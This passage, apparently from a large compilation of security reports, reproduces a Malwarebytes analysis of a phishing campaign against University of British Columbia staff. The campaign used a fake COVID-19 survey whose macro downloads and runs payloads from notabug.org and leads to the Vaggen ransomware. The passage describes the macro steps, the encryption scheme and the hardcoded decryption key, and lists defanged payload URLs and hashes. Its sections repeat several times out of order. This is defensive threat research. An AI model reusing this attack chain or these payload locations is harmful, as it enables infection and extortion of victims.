directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 421 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 422 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 423 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 424 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 425 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 426 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 427 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 428 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 429 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 430 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 431 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 432 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 433 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 434 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 435 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 436 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 437 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 438 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 439 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 440 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 441 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 442 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 443 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 444 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 445 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 446 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 447 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 448 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 449 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 450 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 451 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 452 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 453 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 454 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 